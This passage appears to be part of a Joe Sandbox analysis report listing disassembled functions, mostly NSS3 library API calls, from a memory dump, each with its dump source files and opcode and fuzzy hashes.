Part of subcall function 6C5B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C5B4C60
Part of subcall function 6C5B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4CA1
Part of subcall function 6C5B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C5B4CBE
Part of subcall function 6C5B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4CD2
Part of subcall function 6C5B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B4D3A

PR_GetCurrentThread.NSS3 ref: 6C5AEF9E

Part of subcall function 6C639BF0: TlsGetValue.KERNEL32(?,?,?,6C680A75), ref: 6C639C07

free.MOZGLUE(00000000), ref: 6C5AEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5AF016
free.MOZGLUE(00000000), ref: 6C5AF022

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: b7353348ac5ad6b950a523b539e54dd59e849686360d8c469698abf1e8ccb844
Instruction ID: 4954b4ecd069e89df4acbe1f875da466cf076833d725e3cb52cb6e6ecf48de7c
Opcode Fuzzy Hash: b7353348ac5ad6b950a523b539e54dd59e849686360d8c469698abf1e8ccb844
Instruction Fuzzy Hash: C941A071E00209AFDF018FEADC85AEE7AB9EF48348F004125F905A7350E772D9168BA5

Function 6C59CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C59CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C59D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C59D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59D025
PR_NewLock.NSS3 ref: 6C59D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C59D074

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: e8f234e02c98f910850610b5d5d957a4108403d5edc5da83dafe3b969106f04d
Instruction ID: 54d4de37c8c91c61ce2a45483715db4f05b155c961312509f00e9803b2e228f7
Opcode Fuzzy Hash: e8f234e02c98f910850610b5d5d957a4108403d5edc5da83dafe3b969106f04d
Instruction Fuzzy Hash: 9A41BFB0A013518FEB50DF29CC8479ABBE4EF48318F1441AADC1D8BB46E774D885CBA5

Function 6C5E3FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5E3FF2

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaMark_Util.NSS3(?), ref: 6C5E4001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C5E400F

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C5E4054

Part of subcall function 6C57BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C57BC24
Part of subcall function 6C57BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C57BC39
Part of subcall function 6C57BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C57BC58
Part of subcall function 6C57BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C57BCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E4070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C5E40CD

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 0048dd6fc12f03db1d1bf874cef74345160206e3268a2618ee2776e2c3d9ff98
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 4131C672E00341D7EB00DFA49C41BBB3364AFD961CF154235ED099F742FB61E9588692

Function 6C582E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C572D1A), ref: 6C582E7E

Part of subcall function 6C5D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C578298,?,?,?,6C56FCE5,?), ref: 6C5D07BF
Part of subcall function 6C5D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5D07E6
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D081B
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D0825

PR_Now.NSS3 ref: 6C582EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C582EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C572D1A), ref: 6C582F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C572D1A), ref: 6C582F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C582F81

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 222ebcf89540b5d25c7dd39094bbce6e8866fbe6d790f4e6482e7c283a3a816f
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: FF3128715031208BF710C655DC8EFBF7665EF81318F64497AD42D97ED0EB319886CA25

Function 6C570E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C570A2C), ref: 6C570E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C570A2C), ref: 6C570E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C570A2C), ref: 6C570E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C570A2C), ref: 6C570E90
free.MOZGLUE(00000000), ref: 6C570EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C570A2C), ref: 6C570ED9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: fec5f3cb2b4a3747b1e8774139540172bd899ba60c2c532c2b7585a9144e550e
Instruction ID: 53b85ff50f10bacd243725f367ace6e3606b262cf248200c9bd47153f886336f
Opcode Fuzzy Hash: fec5f3cb2b4a3747b1e8774139540172bd899ba60c2c532c2b7585a9144e550e
Instruction Fuzzy Hash: B1213172E0029457EB3089675C45B6B72EEDBC1748F194437DC1863B41FB62DC9582B2

Function 6C57AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C57AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C57AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C57AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C57AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C699500), ref: 6C57AF23

Part of subcall function 6C5CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5CF0C8
Part of subcall function 6C5CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5CF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C57AF37

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: abd42362b83702d3153393351be43fe032a289ef365eb56cdec9b0ad5c7edcac
Instruction ID: d600631411f06b8c574e1a290d3a9ea080aa889eca129bc64a4fc80c9454d80d
Opcode Fuzzy Hash: abd42362b83702d3153393351be43fe032a289ef365eb56cdec9b0ad5c7edcac
Instruction Fuzzy Hash: 4F213C76509200ABEB208E18DC41B5A77A4AFC572CF144319FC549B791E731D98487BB

Function 6C5FEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5FEE85
realloc.MOZGLUE(2AF198CD,?), ref: 6C5FEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C5FEEC5

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

htonl.WSOCK32(?), ref: 6C5FEEE3
htonl.WSOCK32(00000000,?), ref: 6C5FEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C5FEF01

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: f1da47615432945dd17a3e9d8d7ed1fbfb280a3c1a86540cf4928746f123fe10
Instruction ID: 2dcc95217774cd8e790c5c753165f7d4cf3f635527e5c2090ecc863851f9950d
Opcode Fuzzy Hash: f1da47615432945dd17a3e9d8d7ed1fbfb280a3c1a86540cf4928746f123fe10
Instruction Fuzzy Hash: 7D21E531A00214AFDF149F28DC80B9A77A4EF45358F158129ED299B745E330ED15CBEA

Function 6C577F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C577F68

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C577F7B

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C577FA7

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C69919C,?), ref: 6C577FBB

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C577FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C69915C,00000014), ref: 6C577FFE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: 7b8b737d979107a09f39d10781435737aff59f51585662ea9b54daccafe55f6a
Instruction ID: 49f8b557705e475957b84ea19bf805115739943ef62fc65be982ffc484b6ef2e
Opcode Fuzzy Hash: 7b8b737d979107a09f39d10781435737aff59f51585662ea9b54daccafe55f6a
Instruction Fuzzy Hash: AB112771E003145BE720AA69AD50BBB76F8DF8569CF00062DEC59D2A41F720A988C2B6

Function 6C57BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6C5FDC29,?), ref: 6C57BE64

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C5FDC29,?), ref: 6C57BE78

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C5FDC29,?), ref: 6C57BE96

Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C5FDC29,?), ref: 6C57BEBB

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6C5FDC29,?), ref: 6C57BEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C5FDC29,?), ref: 6C57BEF3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: 0f94c3ad0bda2f52485ad4caeb706496a6d7ee3a7fb74b1a963bac33caea0666
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: FD11EBB1E002159BEB109B699C05F6F37A8DF81258F154028ED09D7740E731ED49C7B1

Function 6C5B9850 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B985B

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000038), ref: 6C5B9871

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C69D9B0,?), ref: 6C5B98A2

Part of subcall function 6C5CE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5CE245
Part of subcall function 6C5CE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C5CE254

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B98B7
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C5B9901
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C5B9910

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$ErrorValue$Alloc_AllocateCriticalDecodeEnterInitItem_LockPoolSectionUnlockcalloc
String ID:
API String ID: 2561846027-0
Opcode ID: 611d09fc90e4714c490578cad50bd59ad13cae2e9f118aaa8451d0f85725d08f
Instruction ID: 04e42eb560a8ec8437807b86c532c092389c97a5626d9935ec1dce31e5fc3fae
Opcode Fuzzy Hash: 611d09fc90e4714c490578cad50bd59ad13cae2e9f118aaa8451d0f85725d08f
Instruction Fuzzy Hash: 31110572900244B7FF005E655C81FAA3E689BA53A8F150220FD18696D1E772DCA587A1

Function 6C603C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C605B40: PR_GetIdentitiesLayer.NSS3 ref: 6C605B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C603D3F

Part of subcall function 6C57BA90: PORT_NewArena_Util.NSS3(00000800,6C603CAF,?), ref: 6C57BABF
Part of subcall function 6C57BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C603CAF,?), ref: 6C57BAD5
Part of subcall function 6C57BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C603CAF,?), ref: 6C57BB08
Part of subcall function 6C57BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C603CAF,?), ref: 6C57BB1A
Part of subcall function 6C57BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C603CAF,?), ref: 6C57BB3B

PR_EnterMonitor.NSS3(?), ref: 6C603CCB

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

PR_EnterMonitor.NSS3(?), ref: 6C603CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C603CF8
PR_ExitMonitor.NSS3(?), ref: 6C603D15
PR_ExitMonitor.NSS3(?), ref: 6C603D2E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
